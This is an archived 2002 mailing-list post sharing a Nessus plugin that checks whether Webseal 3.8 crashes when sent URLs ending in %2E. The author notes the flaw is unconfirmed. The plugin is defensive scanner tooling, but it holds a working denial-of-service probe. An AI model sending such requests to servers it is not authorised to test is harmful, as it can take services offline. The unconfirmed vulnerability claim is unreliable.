'Webseal denial of service'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       nessus-plugins-writers
Subject:    Webseal denial of service
From:       "Michel Arboi" <arboi () noos ! fr>
Date:       2002-08-17 11:16:56
Message-ID: 1029583016.6746.11.camel () rotissoire
[Download RAW message or body]

I don't have any Webseal here, I am not even sure that the flaw exists
:-\







# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References:
# Date:  11 Dec 2001 09:22:50 -0000
# From: "Matthew Lane" <MatthewL@Janusassociates.com>
# To: bugtraq@securityfocus.com
# Subject: Webseal 3.8
#
# Affected:
# Webseal 3.8
#
# *unconfirmed*

if(description)
{
 script_id(11089);
 script_version ("$Revision$");
 
 name["english"] = "Webseal denial of service";
 name["francais"] = "Déni de service contre Webseal";
 script_name(english:name["english"],
	      francais:name["francais"]);
 
 desc["english"] = "
The remote web server dies when an URL ending with %2E is requested.

A cracker may use this flaw to make your server crash continually.

Solution : upgrade your server or firewall it.
Risk factor : High"; 


 desc["francais"] = "
Le serveur web distant meurt quand on demande une URL qui se termine
par %2E

Un pirate pourrait utiliser cette faille pour tuer régulièrement
votre serveur.

Solution : mettez votre logiciel à jour ou protégez-le

Facteur de risque : Elevé";

 script_description(english:desc["english"],
		      francais:desc["francais"]);
		    
 
 summary["english"] = "Request ending with %2E kills WebSeal"; 
 summary["francais"] = "Une requête qui se termine par %2E tue WebSeal";
 script_summary(english:summary["english"],
		  francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
		   francais:"Ce script est Copyright (C) 2002 Michel Arboi");
 
 family["english"] = "Denial of Service ";
 family["francais"] = "Déni de service";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "httpver.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#

include("http_func.inc");

port = get_kb_item("Services/www");
if(!port) port = 80;

if (! get_port_state(port)) exit(0);
soc = open_sock_tcp(port);
if (! soc) exit(0);

url[0] = "/index.html";
url[1] = "/index.htm";
url[2] = "/index.asp";
url[3] = "/";

for (i=0; i<4;i=i+1)
{
 req = http_get(port: port, item: string(url[i], "%2E"));
 send(socket: soc, data: req);
 r = recv(socket: soc, length: 4096);
 close(soc);
 sleep(1);

 soc = open_sock_tcp(port);
 if (! soc) { security_hole(port); exit(0); }
}

sleep(1);
close(soc);
sleep(1);

if (! http_is_alive(port)) { security_hole(port); }

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic